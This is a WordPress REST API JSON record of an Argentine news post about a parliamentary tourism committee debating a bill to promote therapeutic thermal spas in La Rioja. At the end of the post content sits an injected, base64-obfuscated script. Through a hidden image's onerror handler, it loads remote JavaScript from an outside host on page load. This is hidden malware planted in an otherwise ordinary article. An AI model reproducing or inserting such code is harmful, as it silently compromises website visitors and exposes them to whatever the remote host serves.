{"id":8872,"date":"2024-11-04T11:15:36","date_gmt":"2024-11-04T14:15:36","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8872"},"modified":"2025-08-13T15:36:32","modified_gmt":"2025-08-13T18:36:32","slug":"desde-la-rioja-la-comision-de-turismo-debatio-junto-a-ministros-del-pais-sobre-una-ley-para-promover-el-termalismo","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8872","title":{"rendered":"Desde La Rioja, la Comisi\u00f3n de Turismo debati\u00f3 junto a ministros del pa\u00eds sobre una ley para promover el termalismo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-vivid-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-295f174709ddad0e6726fa57aad0bad0\" style=\"color:#e2e3e3\">Durante la reuni\u00f3n, la diputada Carolina Gaillard expuso sobre los detalles de su proyecto. La comitiva de legisladores visit\u00f3 adem\u00e1s las Termas de Santa Teresita.<\/h4>\n\n\n\n<p>En el marco del 2\u00b0 Encuentro Regional de Termalismo y Turismo de Bienestar, realizado en la provincia de La Rioja, integrantes de la Comisi\u00f3n de Turismo de la C\u00e1mara de Diputados debatieron juntos a ministros y funcionarios del pa\u00eds sobre la promoci\u00f3n del uso terap\u00e9utico de las aguas termales. Adem\u00e1s, la comitiva de legisladores visit\u00f3 las Termas de Santa Teresita.<\/p>\n\n\n\n<p>En la apertura de la reuni\u00f3n que se desarroll\u00f3 este viernes en el Sal\u00f3n Agost Carre\u00f1o del Paseo Cultural Pedro Ignacio de Castro Barros, la presidenta de la comisi\u00f3n, la riojana&nbsp;<strong>Gabriela Pedrali<\/strong>&nbsp;(UP), expres\u00f3: \u201cEn estos \u00faltimos a\u00f1os hemos sido testigos del creciente inter\u00e9s en el turismo termal en Argentina, una actividad que no s\u00f3lo promueve el descanso y la relajaci\u00f3n, sino que tambi\u00e9n contribuye al bienestar f\u00edsico y emocional de quienes lo practican\u201d.<\/p>\n\n\n\n<p>La diputada record\u00f3 que \u201c23 de 24 distritos del pa\u00eds tienen termas\u201d, espacios que atraen tanto a turistas locales como internacionales. En ese sentido, resalt\u00f3 el objetivo de \u201cposicionar a nuestro pa\u00eds como destino destacado, con complejos termales de primer nivel\u201d.<\/p>\n\n\n\n<p>En el arranque, los diputados tambi\u00e9n de La Rioja&nbsp;<strong>Hilda Aguirre<\/strong>,&nbsp;<strong>Sergio Casas&nbsp;<\/strong>y<strong>&nbsp;Ricardo Herrera<\/strong>&nbsp;(UP) dieron la bienvenida a los participantes. Herrera hizo \u00e9nfasis en el rol del Estado, al tiempo que calific\u00f3 a la iniciativa como \u201cuna propuesta clara, concreta, que tenga impacto en los pueblos\u201d.<\/p>\n\n\n\n<p>En igual sentido, la santiague\u00f1a<strong>&nbsp;Mar\u00eda Luisa Montoto<\/strong>&nbsp;(UP) manifest\u00f3: \u201cEstamos hablando de algo tan vital como el agua, que no s\u00f3lo nos puede aliviar, refrescar, sino tambi\u00e9n curar. Y esto puede cambiar el destino de nuestros pueblos\u201d.<\/p>\n\n\n\n<p>\u201cSiempre las termas lo asoci\u00e1bamos con las personas grandes y hoy nos damos cuenta, a trav\u00e9s del tiempo, los beneficios maravillosos que tiene para la salud desde la pediatr\u00eda para adelante\u201d, destac\u00f3 la legisladora&nbsp;<strong>Maril\u00fa Quiroz<\/strong>&nbsp;(Pro), quien asegur\u00f3 que \u201ceste es un recurso que lo tenemos a la mano y lo tenemos que aprovechar\u201d. Mientras que la entrerriana&nbsp;<strong>Marcela Antola<\/strong>&nbsp;(UCR), quien confes\u00f3 su enorme satisfacci\u00f3n por el encuentro, se comprometi\u00f3 a darle impulso en la Comisi\u00f3n de Salud una vez que el proyecto llegue all\u00ed.<\/p>\n\n\n\n<p>Al explicar el proyecto de ley del cual es autora, la entrerriana<strong>&nbsp;Carolina Gaillard<\/strong>&nbsp;(UP) arranc\u00f3: \u201cSiempre me desvel\u00f3 pensar c\u00f3mo el pueblo vive en salud; que haya trabajo tambi\u00e9n es vivir en salud\u201d. \u201cMi provincia es una provincia termal, tenemos 13 localidades termales y 15 complejos en total, muchos son recreativos, no terap\u00e9uticos\u201d, precis\u00f3.<\/p>\n\n\n\n<p>En cuanto a la iniciativa, dijo que el \u201cobjetivo principal es la promoci\u00f3n del uso terap\u00e9utico del recurso termal\u201d entendiendo que \u201csalud es mucho m\u00e1s amplio que no estar enfermo; nosotros entendemos que el Estado tiene que garantizar que la poblaci\u00f3n viva en salud, y una forma es promoviendo este tipo de turismo\u201d.<\/p>\n\n\n\n<p>Gaillard subray\u00f3 que pa\u00edses como \u201cRep\u00fablica Checa, Hungr\u00eda, Francia incorporaron los tratamientos termales dentro de la cobertura del sistema de salud\u201d, mientras que en Galicia, Espa\u00f1a, \u201clo que se vio es que se redujo un 40% el uso de f\u00e1rmacos\u201d gracias a las termas.<\/p>\n\n\n\n<p>El proyecto prev\u00e9 la creaci\u00f3n de un registro de establecimientos termales terap\u00e9uticos, donde cada complejo termal se inscriba, el cual no ser\u00e1 obligatorio. Entre otros aspectos, busca \u201cfavorecer a que se creen corredores termales\u201d, \u201cpromover la formaci\u00f3n de especialistas en termalismo\u201d y \u201cbeneficios de promoci\u00f3n y difusi\u00f3n\u201d.<\/p>\n\n\n\n<p>La diputada de UP tambi\u00e9n se\u00f1al\u00f3 que se contempla el \u201ctermalismo social, para que la ANSeS cubra una semana al a\u00f1o de tratamiento a los jubilados en los complejos termales que est\u00e9n inscriptos en el registro\u201d.<\/p>\n\n\n\n<p>Al abrirse la mesa de expositores,<strong>&nbsp;Gustavo Luna<\/strong>, ministro de Turismo y Culturas de La Rioja, sostuvo que \u201ces imposible lograr la felicidad del pueblo sin salud y sin trabajo\u201d y abog\u00f3 por \u201cdeterminar una ruta nacional de termalismo, comenzando los norte\u00f1os a dar el ejemplo\u201d.<\/p>\n\n\n\n<p><strong>Nelson Bravo<\/strong>, subsecretario de Turismo de Santiago del Estero, indic\u00f3 que \u201cla ciudad de Termas de R\u00edo Hondo cumpli\u00f3 70 a\u00f1os\u201d. Al calificarlo como \u201cel spa m\u00e1s grande de Latinoam\u00e9rica\u201d, record\u00f3 que en el a\u00f1o 2005 \u201ccon (el gobernador)&nbsp;<strong>Gerardo Zamora<\/strong>&nbsp;se toma como pol\u00edtica de Estado y empiezan grandes inversiones\u201d. \u201cLa intervenci\u00f3n del Estado ha permitido que un destino que estaba desarrollado evolucione a otro nivel\u201d, agreg\u00f3.<\/p>\n\n\n\n<p>A su turno,&nbsp;<strong>Mar\u00eda Soledad Mart\u00ednez<\/strong>, subsecretaria de Turismo bonaerense, mencion\u00f3 que \u201cla provincia de Buenos Aires, despu\u00e9s de Entre R\u00edos y Santiago del Estero, es la tercera en cantidad de parques termales\u201d. Puntualmente se refiri\u00f3 a \u201clas termas de Carhu\u00e9 que tienen 200 gramos de sal por cada litro de agua, como en el Mar Muerto, uno autom\u00e1ticamente se mete se queda flotando\u201d. \u201cHay m\u00e9dicos que recetan, en vez de una rehabilitaci\u00f3n en kinesiolog\u00eda, diez ba\u00f1os termales de 20 minutos\u201d, destac\u00f3.<\/p>\n\n\n\n<p>Por su parte,&nbsp;<strong>Anabela Lugo<\/strong>, secretaria de Turismo de San Jos\u00e9, Entre R\u00edos, repas\u00f3: \u201cTenemos en un \u00e1rea de 60 kil\u00f3metros tres complejos termales muy importantes, como el nuestro, las termas de Villa Elisa y las de Col\u00f3n. Desde 2022, por decisi\u00f3n pol\u00edtica del intendente&nbsp;<strong>Gustavo Bastian<\/strong>, hemos asumido la gesti\u00f3n del complejo termas San Jos\u00e9 de manera municipal, al vencerse la concesi\u00f3n que estuvo 17 a\u00f1os en manos de un privado\u201d.<\/p>\n\n\n\n<p>\u201cLas cosas administradas desde el Estado s\u00ed se pueden hacer bien y de manera prolija\u201d, reivindic\u00f3 y habl\u00f3 de que el complejo cuenta con \u201cun programa de turismo social termal para adultos mayores\u201d que \u201cestaba financiado por el PAMI, pero a causa del ajuste hoy se financia con recursos municipales\u201d.<\/p>\n\n\n\n<p>Durante la reuni\u00f3n tambi\u00e9n expusieron la senadora nacional por La Rioja\u00a0<strong>Florencia L\u00f3pez<\/strong>; el ministro de Turismo de Salta,\u00a0<strong>Mario Pe\u00f1a<\/strong>; el intendente de Serrezuela (C\u00f3rdoba),<strong>\u00a0Ricardo Mart\u00edn<\/strong>; el ministro de Salud de La Rioja,\u00a0<strong>Juan Carlos Vergara<\/strong>; la secretaria de Turismo, Deporte y Ambiente de Villaguay (Entre R\u00edos),\u00a0<strong>Mar\u00eda Cecilia Roveredo<\/strong>; el director de Calidad Tur\u00edstica de Catamarca,\u00a0<strong>Gonzalo Nieto<\/strong>; y el secretario de Turismo de La Rioja,<strong>\u00a0Jos\u00e9 Rosa<\/strong>.<\/p>\n<p>\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-de-pantalla_4-11-2024_111249_www.parlamentario.com_.jpeg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"846\" height=\"122\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-de-pantalla_4-11-2024_111249_www.parlamentario.com_.jpeg\" alt=\"\" class=\"wp-image-8873\" style=\"width:388px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-de-pantalla_4-11-2024_111249_www.parlamentario.com_.jpeg 846w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-de-pantalla_4-11-2024_111249_www.parlamentario.com_-300x43.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-de-pantalla_4-11-2024_111249_www.parlamentario.com_-768x111.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-de-pantalla_4-11-2024_111249_www.parlamentario.com_-696x100.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-de-pantalla_4-11-2024_111249_www.parlamentario.com_-320x46.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-de-pantalla_4-11-2024_111249_www.parlamentario.com_-480x69.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-de-pantalla_4-11-2024_111249_www.parlamentario.com_-800x115.jpeg 800w\" sizes=\"(max-width: 846px) 100vw, 846px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Durante la reuni\u00f3n, la diputada Carolina Gaillard expuso sobre los detalles de su proyecto. La comitiva de legisladores visit\u00f3 adem\u00e1s las Termas de Santa Teresita. En el marco del 2\u00b0 Encuentro Regional de Termalismo y Turismo de Bienestar, realizado en la provincia de La Rioja, integrantes de la Comisi\u00f3n de Turismo de la C\u00e1mara de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8874,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8872","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8872","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8872"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8872\/revisions"}],"predecessor-version":[{"id":10051,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8872\/revisions\/10051"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8874"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8872"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8872"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8872"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}